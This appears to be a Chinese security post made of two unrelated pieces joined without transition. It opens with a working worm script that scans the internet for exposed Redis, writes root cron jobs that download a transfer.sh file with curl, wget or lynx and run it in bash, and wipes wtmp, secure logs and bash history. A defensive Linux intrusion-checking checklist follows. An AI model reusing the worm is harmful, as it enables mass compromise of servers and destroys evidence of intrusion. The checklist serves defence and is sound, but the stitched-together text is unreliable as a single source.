pnx=/usr/bin/pnscan for x in $( seq 1 224 | sort -R ); do for y in $( seq 0 255 | sort -R ); do $pnx -t512 -R '6f 73 3a 4c 69 6e 75 78' -W '2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a' $x.$y.0.0/16 6379 > .r.$x.$y.o awk '/Linux/ {print $1, $3}' .r.$x.$y.o > .r.$x.$y.l while read -r h p; do cat .dat | redis-cli -h $h -p $p --raw & done < .r.$x.$y.l done done echo 0 > /var/spool/mail/root 2>/dev/null echo 0 > /var/log/wtmp 2>/dev/null echo 0 > /var/log/secure 2>/dev/null echo 0 > /root/.bash_history 2>/dev/null exit 0.dat[创建定时任务]flushall config set dir /var/spool/cron config set dbfilename root set Backup1 "\t\n*/2 * * * * curl -s https://transfer.sh/ZShKM/tmp.Nm1jfFNPap > .cmd && bash .cmd\n\t" set Backup2 "\t\n*/5 * * * * wget -O .cmd https://transfer.sh/ZShKM/tmp.Nm1jfFNPap && bash .cmd\n\t" set Backup3 "\t\n*/10 * * * * lynx -source https://transfer.sh/ZShKM/tmp.Nm1jfFNPap > .cmd && bash .cmd\n\t" save config set dir /var/spool/cron/crontabs save exit加固建议：不要将Redis暴露在公网如确实需要，将Redis设置高强度密码并通过白名单限制接入定期备份、审查服务器日志作者：Sp4ce

0x00 审计命令在linux中有5个用于审计的命令：last：这个命令可用于查看我们系统的成功登录、关机、重启等情况；这个命令就是将/var/log/wtmp文件格式化输出。lastb：这个命令用于查看登录失败的情况；这个命令就是将/var/log/btmp文件格式化输出。lastlog：这个命令用于查看用户上一次的登录情况；这个命令就是将/var/log/lastlog文件格式化输出。who：这个命令用户查看当前登录系统的情况；这个命令就是将/var/log/utmp文件格式化输出。w：与who命令一致。关于它们的使用：man last，last与lastb命令使用方法类似：#!bash last [-R] [-num] [ -n num ] [-adFiowx] [ -f file ] [ -t YYYYMMDDHHMMSS ] [name...] [tty...] lastb [-R] [-num] [ -n num ] [ -f file ] [-adFiowx] [name...] [tty...] who [OPTION]... [ FILE | ARG1 ARG2 ] 参数说明：查看系统登录情况last：不带任何参数，显示系统的登录以及重启情况只针对关机/重启使用-x参数可以针对不同的情况进行查看只针对登录使用-d参数，并且参数后不用跟任何选项显示错误的登录信息lastb查看当前登录情况who、w0x01 日志查看在Linux系统中，有三类主要的日志子系统:连接时间日志: 由多个程序执行，把记录写入到/var/log/wtmp和/var/run/utmp，login等程序会更新wtmp和utmp文件，使系统管理员能够跟踪谁在何时登录到系统。（utmp、wtmp日志文件是多数Linux日志子系统的关键，它保存了用户登录进入和退出的记录。有关当前登录用户的信息记录在文件utmp中; 登录进入和退出记录在文件wtmp中; 数据交换、关机以及重启的机器信息也都记录在wtmp文件中。所有的记录都包含时间戳。）进程统计: 由系统内核执行，当一个进程终止时，为每个进程往进程统计文件（pacct或acct）中写一个记录。进程统计的目的是为系统中的基本服务提供命令使用统计。错误日志: 由syslogd（8）守护程序执行，各种系统守护进程、用户程序和内核通过syslogd（3）守护程序向文件/var/log/messages报告值得注意的事件。另外有许多Unix程序创建日志。像HTTP和FTP这样提供网络服务的服务器也保持详细的日志。日志目录：/var/log(默认目录)查看进程日志cat /var/log/messages查看服务日志cat /var/log/maillog0x02 用户查看Linux不同的用户，有不同的操作权限，但是所有用户都会在/etc/passwd /etc/shadow /etc/group /etc/group- 文件中记录；查看详细less /etc/passwd：查看是否有新增用户grep :0 /etc/passwd：查看是否有特权用户（root权限用户）ls -l /etc/passwd：查看passwd最后修改时间awk -F: '$3==0 {print $1}' /etc/passwd：查看是否存在特权用户awk -F: 'length($2)==0 {print $1}' /etc/shadow：查看是否存在空口令用户注：linux设置空口令：passwd -d username0x03 进程查看普通进程查看进程中我们一般使用ps来查看进程；man psps -aux：查看进程lsof -p pid：查看进程所打开的端口及文件检查隐藏进程ps -ef | awk '{print }' | sort -n | uniq >1ls /proc | sort -n |uniq >2diff 1 2注：以上3个步骤为检查隐藏进程0x04 其他检查检查文件find / -uid 0 -print：查找特权用户文件find / -size +10000k -print：查找大于10000k的文件find / -name "..." -prin：查找用户名为...的文件find / -name core -exec ls -l {} \;：查找core文件，并列出详细信息md5sum -b filename：查看文件的md5值rpm -qf /bin/ls：检查文件的完整性（还有其它/bin目录下的文件）检查网络ip link | grep PROMISC：正常网卡不应该存在promisc，如果存在可能有snifferlsof -inetstat -nap：查看不正常端口arp -a：查看arp记录是否正常计划任务crontab -u root -l：查看root用户的计划任务cat /etc/crontabls -l /etc/cron.*：查看cron文件是变化的详细ls /var/spool/cron/检查后门对于linux的后门检查，网络上有一些公开的工具，但是在不使用这些工具的前提时，我们可以通过一些命令来获取一些信息。首先就是检测计划任务，可以参考上面；第二：查看ssh永久链接文件：vim $HOME/.ssh/authorized_keys第三：lsmod：检查内核模块第四：chkconfig --list/systemctl list-units --type=service：检查自启第五：服务后门/异常端口（是否存在shell反弹或监听）其它：ls /etc/rc.dls /etc/rc3.d作者：Blood_Zero